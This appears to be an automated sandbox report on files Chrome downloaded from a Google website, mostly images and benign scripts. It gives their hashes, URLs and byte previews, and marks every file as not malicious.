                                                                                                                                                                                                                                                                                          Preview:......JFIF.....H.H.....LExif..MM.*...................i.........&.............................).......8Photoshop 3.0.8BIM........8BIM.%..................B~...(ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl....8.G.m..Oz../................................desc.......0cprt...,...Pwtpt...|....rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... mluc............enUS.........D.i.s.p.l.a.y. .P.3mluc............enUS...4.....C.o.p.y.r.i.g.h.t. .A.p.p.l.e. .I.n.c...,. .2.0.2.2XYZ ...............,XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......Y.......[sf32.......B.......&.......................n......)...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):262564
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.5729374438623225
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:4lipmFU7Lli04d7G3BsEemvebNqH0fxnQC:KrW7L4nhi25
                                                                                                                                                                                                                                                                                          MD5:989ABC3434D1191605BF38009A10C5E7
                                                                                                                                                                                                                                                                                          SHA1:A89D2A1D2D7DA2E7F8CC3BBAB73AC5D40B11C9AF
                                                                                                                                                                                                                                                                                          SHA-256:FC9EECCC466509DC36AFB2FCFE7122996D2956D107006A4F56FBB666A2D3388A
                                                                                                                                                                                                                                                                                          SHA-512:987D0614F5354F37A955CE337E914101093FAA749F57798C909B8BBA569612C45FBE811DDE913F4D5F91582FF0C4C9A29ABAF21001E325F438DA4C610046BC59
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":16,"vtp_rules":["list","recovertogether\\.withgoogle\\.com"],"tag_id":8},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetVa
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 120x120, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):7124
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.565676034080946
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:t6MT0D5MdtbZPAVwzVwmSA2UJWhzEd+GVG5n8oCWciGeqqVpFeQiN9/6/SX:XYNMtKwZwUJWx9nJCW/t2B8aX
                                                                                                                                                                                                                                                                                          MD5:347536242E2AEB5CB09672220066D45F
                                                                                                                                                                                                                                                                                          SHA1:002AE7E5866BE9904702A7DFC9BBAD74DA8C25D5
                                                                                                                                                                                                                                                                                          SHA-256:C9DD166FEB248045ACF61FCEFECA21CC42ECB37CF0753F16B1DEB2731AE5E677
                                                                                                                                                                                                                                                                                          SHA-512:1A6FEA037A534F5759D6B6C2A99FFD939EA04B3213474C74461E6BE7A13A53CE2E54614B8DA2DBA0621A86B143E315CF179D24B6F234DA32C34A9A46B2653A46
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=..U.xB...9.................................desc...D...ybXYZ........bTRC........dmdd........gXYZ...h....gTRC........lumi...|....meas.......$bkpt........rXYZ........rTRC........tech........vued........wtpt...p....cprt.......7chad.......,desc........sRGB IEC61966-2-1 black scaled..................................................................................XYZ ......$.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|...............................................................%.+.2.8.>.E.L.R.Y.`.g.n.u.|.........................................&./.8.A.K.T.].g.q.z...............................!.-.8.C.O.Z.f.r.~......................... .-.;.H.U.c.q.~.......................+.:.I.X.g.w.....................'.7.H.Y.j.{...................+.=.O.a.t...................2.F.Z.n.................%.:.O.d.y..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):7233
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.946888636181775
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:AzBGBOwbzhKjEMQqCLrwAF71Sou3OLPHeDw96R:A6zc9QRLrw6ZSHm2w0R
                                                                                                                                                                                                                                                                                          MD5:32D9B848A23261BFFCEB39FA815E56C8
                                                                                                                                                                                                                                                                                          SHA1:BC566AA22BF3773D1F40DBEDC0B8F1693E09378B
                                                                                                                                                                                                                                                                                          SHA-256:967B461B12952378DEFEC9C46D86AD478AFF0288FBDA42E004D31129CB11964B
                                                                                                                                                                                                                                                                                          SHA-512:9C43F4202BB00A45207FA40FB416630395A41393D604585ACA239C0E30C80E12DAAA02F4DEE2D3F11BBC228AF53A3003D56CB2896D66A1003A71742AE86AB439
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/7j1-9AjGTjyFcEDU5lJw2BpZNYWNKgkxegHVv012Pm5OPBratN5ZsNVtpILRwXqE5Givogcj2VMswYdKR1dKvLvo2EQFSM0p7yTxYw=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..][p...z....d.0Ia6.....B*T.....[8.L.....8.......Tl............P6.@.xq.6.F.Jb.X.n.mI....>..0g.\z..D._.J.LO.?..........q..q..q... .-@...o.4MK...[D.E.......r-..e.>|..DQ......)..)......4M)-!..!.(.Bf.!....p..rf.m'..5"......u...)...>d.F#...a.?.OB._.R.B..!.............!..B..}...Y........a...a<l.......`.?....I.E.. |..B.!.......h.......m..>f..t]..4....jeX.....B.E.3+....o.~1T.K..Ipoo..J.3...i...0..W-......X..X..B..o. T.U."...g.a...~....ixIp..[/..d.>.H@..s. <.....@.T.+...-...PU.VM...bJ)...N....$aff..0.o}&..#......hgg.k......F...4M.(..sA.nmmE<./.`UU1>>.*o.g..>!........F.a......oEQF$I.D..7.!..R.....r."!.x.uuu.Y.^PU..Ba...#...~.*.p`.5..._...rTU.V].j....6..q....bll...E;.J......Db\..:;;?.\@.XR.....I).(...........w.u..$...:p...K$..%.....r....E...ie.R.....0P__....B0;;[flUs...D".............T
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):150178
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.955382794381521
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:uKLqcd+4OsWDj+gsc6+nPtdWsxmKk1JY262bnjS0jnI6phW8GVOe98c:uLQ+4OwcjnPtdWAk3D62bFdqXZ
                                                                                                                                                                                                                                                                                          MD5:6C171E0E84327176E93A4466E645B375
                                                                                                                                                                                                                                                                                          SHA1:E3BF830C55F5E586B2DD7BA72CD2D051A6FEE598
                                                                                                                                                                                                                                                                                          SHA-256:896363E823871ABF44C98366F8AB6250EC6102109CD8C9792DF41D7E8E0CF999
                                                                                                                                                                                                                                                                                          SHA-512:A48C435EC0D2B2022A0A8DC2284191F55BE386B8A52E8B48FE5CBA57BA02712CD4B0F7476143225D0474F92043E4BD618870214BD21F1CAE494E5FC636ECB099
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/uJrIoy0GJ8gU_MZo9wDRvrJM9LWV1noGXNytkoQtZE8sgTKXS5MM5NPMckKZyrk4sGykUMHv6DaMequsYcvqymH7jH6AF6dMesc=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFF.J..WEBPVP8L.J../.....u!...B.m..?...""y^.(F..(.......>.M.H.m[.#........ym....(.bfff....03#....%.p....6..[.$K.$.B.........~...w7..].kK.$......P...;..8.n_.....{......mTv".....$..].5..\..."2.{.3f.......y........L.....3.j.......{...J...Lw..oI.,I.l.Y.#2../..s{..p....y....3k..*3.T.mm.7..y=/} .j.3....33'..:i(.....u..(.j....c..).ty|.>...I......bwWkf.fvfm.l....6.m.n..W..........#..........$I.$I.E$.f....9....u}..k....p7..m.j.m..k.c.)i........~fF...1....ZK....V...Z.$.^.....m[&..u...EDb..$.."[2.l.-s...af\k.7._`^.3.8.f..v..A.X*..../.7 .2.....mE.$.Z.\.Q0s........bxX...f.."r..-.j.$k}........R...T....0n\s...l+q.I.$.`........................................................................................................................................#xj.).Lz..e....|.9.&...M.y.......p...i....x..aC....s..."....L..tz...`.....BH.....x.......x.~..H.$g.+Y..H...@0.C8....I-..J..9(..Q.[....L.....;...1G.6.m.a3 ...`.5....3.d#8...5.A. ..L$!G..T.:..L.h..8..<T....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 9521
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3983
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.944700715003657
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:+nA/kUARYBpA7bVOgxRPzjfUBWNeDr61bcpiulWMHas:+A/7ARF74gxJjsBWar6xcpPLas
                                                                                                                                                                                                                                                                                          MD5:457E75122CFB1F931BD1BA92A0470F6D
                                                                                                                                                                                                                                                                                          SHA1:534DCF73C994ECAC30FAAEA384B01B93356E010D
                                                                                                                                                                                                                                                                                          SHA-256:EB87393CC80ED5910227BE99550C51098F4A0829FCC1F78E715388726683A569
                                                                                                                                                                                                                                                                                          SHA-512:EFA4212ADCFDDD71976B347BA4D9FD43B13A2658022235CAA51165692335EEC5CE0E81F577A026E179F0BAC2566948B294887E0C950D43A58DB391D6ADEE2E60
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:............n[G.._.@.$....2..df.E..*.m..M.BH..:3O?._MJ.e..$..b./...u..._...N...n_.m........>...|}..Ep.`..././o....Wo^...7......n}6....~..37.)%.X.vZm.././.6..~..~..~..K.?{WB..I......Wg.\^^.M.~..|.B.K....S...}\...s+i:|iO7....s.y..e.-,..c^0..:....?..[.S.....|.&.......z...=[.M......1...bz?..g_.D........z.r....-..b.F......C..z....O....g.._.x{.d..?u1....sw.....)....rG*P..#Ez.....c..a..VW7..zZ.Q...i........#..Y......:...[........1S9....S.)._..ZI>..|..~z....k.h.|..Gk=c4<.it...v.-..|..G"[..~....~.[/n.i..xw.....Q.g..o.n..Y...5..E.B.]oSt...05k..#..Z..g..~......B...".TF.....<7.G......+.>..O68l6.?a.6..m.o.....g.....s.eJXl..Dn,..{..c./..~..BS....).....x..a.Q...p...5O(......z.ps}.......S.S.c....<mB u..zH...H..qe.n.7........!;|..h.P...6>.3.^....'......N[....y.c..8U;.....G<....Y[.<si...`..gB...^...U. .dd.....s...........Cf.b8...o...../..~.z..N....`4.8.4. .`.9B(y.Ps.........R.... F.C.QS.p.......D.v...2.AD5..Y.x.....p.9b....gOSp..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):419336
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.286208964696697
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:bn2EVs0K0aSCDlGgfxHH2xYk6ToounAmhY:bn2EVgTRVNHxUov
                                                                                                                                                                                                                                                                                          MD5:26AE8FE62168787666397F9DF92C503D
                                                                                                                                                                                                                                                                                          SHA1:C575FAF0432AC2DC8CD588F24FBB8B930738B770
                                                                                                                                                                                                                                                                                          SHA-256:B8EA464A09AECDF1D03EC5CDD6A182ED47B8C0F87E754EA48E9A1B87440BE013
                                                                                                                                                                                                                                                                                          SHA-512:E41530C3545CF682873C066801BAD6F85C44883FB1624C8698061CC8A6EC2D8FCF61EA43AC23A17A4A0EEB01081014287D7AD6BFF6521591B2DAF72BC8DDBD46
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/LSYb8fYo6BAagAGpNrc_tg1pGwWDUiQ6Q_b_aHGIL6YFJS3t3Q9tz8Zp_PDemg8w4wkFh8ronfMjHlZxzyrxJI_yHogTxmMKtVEQyA=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFF.f..WEBPVP8L.e../..D..u!...R...d.Q.w."b..o.vq..;s7S.......6.....U.JV+..V<...(-........0....\vl....b..gg.O..g7...=..1...!.f.!&.\v...`.0...(...m.-....V=._......y8A.....8.....HvEN.4....*S3..a..mog.....1...d.pb;...5.;U....s...y#I....#.$....dQ.-N.....i)e..|.Y7Jy..._....X......Hy...).={d.K.e!.9...`....._..m........z..tX.s.......19.;E9e6.7;e..7.....fl.#.9.>..g.........b...\...R..9@...E..i...^2.$....3..#1+#_f....ri./.]..Y..g.i./.`Vw.q...M.e..Gu..N..l..:%.$I........s.x7..e.7.:.6...m.\7....ft......Q.c.Y....x=g..,..G.....E..(.o.{-.6lm..../..8 .....P..... ..(.... ........ ..7Q:z.........8r...$...P..K`Y..*.f.hg..F[c..v..r.y......*......w,.......D....R.u.....L4A. .S......o..U.k..4s...z.....E.2..A..g.y..n#I..e.#..%......8....;....Gq..l/..).^.. ...A.n[..m.G..d..".+...l......r...8T.aj.0.w..$H..6.f....>.......m.m..Cd...N.'.g..y....xRr^.....d.d.1.}?...i.i....3..Mz.....Iv.69|K.]V.|......................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):514
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.481765030174575
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:/EiEsnQchxZkP0nat9NbR08z5fFIu2+aRHC8OvmO36IAe:jQMZkMa/AYf9aRi3EIr
                                                                                                                                                                                                                                                                                          MD5:6B024625FC2D074F623821A04210C1E5
                                                                                                                                                                                                                                                                                          SHA1:36CD79C4FEA20C21D4AF50A80098DC42B4D7F235
                                                                                                                                                                                                                                                                                          SHA-256:C262610200277C07EBCEB28E91C729DE56D5C89D40654E484FA386C1E99BC16F
                                                                                                                                                                                                                                                                                          SHA-512:7AF0A3CEFB527FCCCC3EFDD7AC6028B17D10E35A214072CB2FBB040C05697ABC2B14DBE9DEA7C48A004ED106D22BB223A381FD1E5AC2EE67346DDBC1B96CA6EE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?./..m#.?...}.d..m...'...uV...\..Eo...G...1..(0.rm.j[....Ro......+.>`...H..qj...Fn$9..p.f...`..z`.%......jt..... .w_h.o.Q..#.<...'...m.(...d.yQ.....<p).......Ev&..y9;..Z..UiR..b..T...L.B.%.p.......<..gQ......b.....l'2.u.n.,N...2.9'....B....n.i.|.9......D.E.+...v:...k.7.Sr".wJi...].<V)u....pJ.\D..jPeN... .a.2s^tHA.=..yuS.[.U)...z...:.(.#...6....d..E....K/^<....o.....D..E.<K//@....c...o.|..}|........./ ............../.......o.(=......9D....~?.7..0...o.........\.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2063
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.964412336499399
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:mafGsGbHiPDYDec0NQWALAHQOYRiQzTT6Kyz8cllwAzHI+ZIZM+:moGX+OVeBQjGNlnXCz
                                                                                                                                                                                                                                                                                          MD5:FF1DD21B89A09A8BBEDCF9742486FF42
                                                                                                                                                                                                                                                                                          SHA1:49D27816D2122B0935B743691ADCE588AC0E5BCE
                                                                                                                                                                                                                                                                                          SHA-256:EF4CB9F95C00F238C345926A1095C963DAD6A324C92AD752611C1744480F2023
                                                                                                                                                                                                                                                                                          SHA-512:CCF03A2E10D06E742B87E6F5F35B7877D0A45D72305C18DDF4D03A70875BDF5619CFD50F2D2CA2845B66C163E64712DDB54E4CE055EDAD51A399E151B44BF0B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 192 192" height="24px" viewBox="0 0 192 192" width="24px"><rect fill="none" height="192" width="192"/><g><path d="M68.69,114.33c-30-39.69-60.8-9.53-52.76,18.21C29.74,162.89,60.56,184,95.97,184 c31.4,0,58.55-16.37,73.97-40.2C146.74,165.51,104.63,161.88,68.69,114.33z" fill="#255FDB"/><path d="M95.51,87C54.25,24.42,8,57.77,8,96.02c0,13.12,2.86,25.5,7.99,36.68C10.51,106.79,40.28,86.81,68,124 c40.25,54,79.75,44.5,101.85,19.93c5.97-8.9,11.79-22.55,13.42-36.12l-0.03,0.17C173.78,137.4,131.9,142.19,95.51,87z" fill="#4285F4"/><path d="M123.79,59C93.15,8.45,54.3,13,28.03,40.09C15.54,55.28,8,74.75,8,96c2.75-37.04,47.5-62.75,88,0 c36.05,55.85,80.85,41.3,87.23,12.12l0.04-0.28c0.64-4.01,0.71-7.84,0.71-11.96c0-1.33,0.05-2.65-0.01-3.96 C168.35,103,147.85,98.69,123.79,59z" fill="#91BFFF"/><path d="M124,68c28.06,45.11,52.25,33.57,59.97,23.92c-0.3-6.88-1.42-13.54-3.22-19.91 c-13.08,0.27-16.13-1.91-28.95-21.51C132.08,20.35,107.3,0.02,64.04,
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4110
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.904110883327691
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:gR5LOpTX9H3puQK3g30VrCFIUqtmxUrMn0PzfDyYIjUshvS8:0dORXHhig30J4IJmkIhq8
                                                                                                                                                                                                                                                                                          MD5:B0408DD73867E5962BF74022FD789013
                                                                                                                                                                                                                                                                                          SHA1:B020DE2C70933F75B3471AD9D6871AD056AB28B8
                                                                                                                                                                                                                                                                                          SHA-256:C734894408D819C9C692E3A850AD32B7C505491BB7744F379CECCF83C8FA3114
                                                                                                                                                                                                                                                                                          SHA-512:20C0FC2CFEA1D8DB3B5ACFB98083FF4983FC88434386AFF92B058460267F595E9ADE52D6971FA61CE2FD354B4AE1F2928FB398EEF89CF0A300744DEFE911E9CF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i5!3i7!4i256!2m3!1e0!2sm!3i707457713!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=27966
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?.....$e...}.1...m#).....cF..@(..?#..1...k...f;F../..x.5......XkYk.9.9.c....x.$I.m...GB......m.[........X........0..JN.y.$...|OV.|..J.._..#2..h....l.....c....$5..Hw.&.L's.."..$....o....z.z.a.M.....Mh.G.Q'..i=..w#..72.w.w......oA.7.........&..K..>._.Y.....|...C."...Q.V+....f.sx......~...n....{'Wo<......N.O....p.p.x.{?.}z!.(...7G....H.Y..+.z9.l>).-.$[..+..Ns.4.....[o......w.TO8..dz..&..2.3.qiY...>....}+G.....Oc>+>.l.o&:.}...:y.(.xlF..)S-.iF.eY.W."..JF...kO)-...).%...RZ...9...eY..R.K:^..j^...i....D2.r.../.D...g..~...'..~.E..<..~...8._o.......oI...5.z..-........IUuY...%.jZ..j..L.B3.2..T.T...O..M_EV..H..M.6.......Y<...Q.n.'u.o.).....H\.t)>z.$......V..}l.....n..4/...J.~)._fu.n..o&.}..m.'9/.._.".f. ........'*.]T.).j.z.TU.r.5/....R.....7^&..!S.9..,.........".+'....!........d.|.,9.\.|..~w"...?...{rJ.+...._....IzL..|M.....C..g...{./!....Uj...n^....i.9%...$+..../.%....F.D...3.z....|...._O..I...?.......K?..O.,9.FT.E..a
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1852
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8172847193983115
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:ThPq7aSyeIaxKBD0vBBg2AmOJIuQ+TuK3R/PP0:tPAaS+axe0vemSIuJTV1PP0
                                                                                                                                                                                                                                                                                          MD5:8286DD8AD1827439BB3E83CDAA8E6818
                                                                                                                                                                                                                                                                                          SHA1:CAEEC5254D6E2FCDB698B999E05302A134E316DA
                                                                                                                                                                                                                                                                                          SHA-256:8ABCAFCD512BD44D17852703BF465C67CF4B5EBB798B88E0B037AD79918A28A6
                                                                                                                                                                                                                                                                                          SHA-512:7D49CC9CA81703FC4E912A9D9652C174682D652918DC5EEA09E8431C71E7859D24488791098FDB97BE0FBE928E512381B91838D838EF9F749672D0463C79B843
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/5CsRqfMEP1Rv-PPv9G4962lyEuvb4roSLJHJQWPbmCa51AmvynfoGfoKsKiS87QhX07xQMZAeLp8qoSy7CjVZkXJ1WapQiJkroCeJw=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..._lTe....{...P..K..Z..&...q5....^...S.&.c$f..D/..x.F/L.0.....H..h....Xu.7."...+..Z.h...9.^..4Hg.9.g..'iH[.}....=.9..RJ)..RJ)..RJ)..RJ)..J.c...d/7 L.#..f.Gl.q.&..L..~.g_...J.=..v...o..I....F.y.y.OG55...=..l.].. ..uk..k.lW.1.....2..\....5..u.b.....<.n..4v..M8..f.V..].f.Xkcn.6....&O<...~lJ...W.<..h.f..5..+....j..X.3....9.#_..C1...0.....j..H.3...DB=...g......b..C....k..S.?..:.w..:L..*.+W..+.[...........Ux....9.....2.-z.7T...[0.Q"..b.X.......^.c.H.hm......$..pC\SD..6TU....#bnt#....R1....$p.E..hCU.b.y....)`..2\....i;..pm.S............6v....+XWn@..?...?}........hC...o}....}P.weTU+...{..:.....9..}.......t.....wO.s...Mb...4......l,.L.....My.%.{..d.X.4.x..-...c"...(.6c.N.q....5.b`|...*......<X...D.v...\.^.9)..].............f..p..s)..h...%.x.dW9\..o.D..E..:.......T.....00.......[..t..Rswa.0p...?....-..4.j8..Y,...J.T..I.E.....-d..e.9..+..p.....?...T6S..+1.i.'>Y.?.l...W......,.....V..c..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3745)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4038
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.304825408517399
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:DkFs68yV4k/1BedpFVHgbDyHFf6Z1WKhdY7FHVMfrTQzqIGNqIjp:QZv2pEbiSZ1WV/MfKLGzt
                                                                                                                                                                                                                                                                                          MD5:9E011B074A17F4B03ADE7D11459C0D8A
                                                                                                                                                                                                                                                                                          SHA1:21B11E46187E60D7FB26B847A0761E9173C2C5F8
                                                                                                                                                                                                                                                                                          SHA-256:E82F1A686CE2F7A62A7078BF101A386C58BD4E3B0B2E99F5774B7C1E54F8440F
                                                                                                                                                                                                                                                                                          SHA-512:D4F2AA5C1CF68EED897007AB1CA2F495D8343D3FF5BEBDCB821600B5CE7DFBDC72F1ED7D404B5A354CADD60A6BA2EC969E938FA8D2632F8817311304A476322D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/external_hosted/greensock3/dist/ScrollToPlugin.min.js
                                                                                                                                                                                                                                                                                          Preview:/*!. * ScrollToPlugin 3.12.5. * https://gsap.com. * . * @license Copyright 2024, GreenSock. All rights reserved.. * Subject to the terms at https://gsap.com/standard-license or for Club GSAP members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e=e||self).window=e.window||{})}(this,function(e){"use strict";function l(){return"undefined"!=typeof window}function m(){return f||l()&&(f=window.gsap)&&f.registerPlugin&&f}function n(e){return"string"==typeof e}function o(e){return"function"==typeof e}function p(e,t){var o="x"===t?"Width":"Height",n="scroll"+o,r="client"+o;return e===T||e===i||e===c?Math.max(i[n],c[n])-(T["inner"+o]||i[r]||c[r]):e[n]-e["offset"+o]}function q(e,t){var o="scroll"+("x"===t?"Left":"Top");return e===T&&(null!=e.pageXOffset?o="page"+t.toUpperCase()+"Offset":e=null!=i[o]?i:c),functi
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):733
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.23501156552437
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:trOPGPuCtLQVCRFAypqaFqixWkECT041T1i1AtL8gYgx2zV3lp26/:tKPGPuJVCROy9/lw4OmJ+QSV3l86/
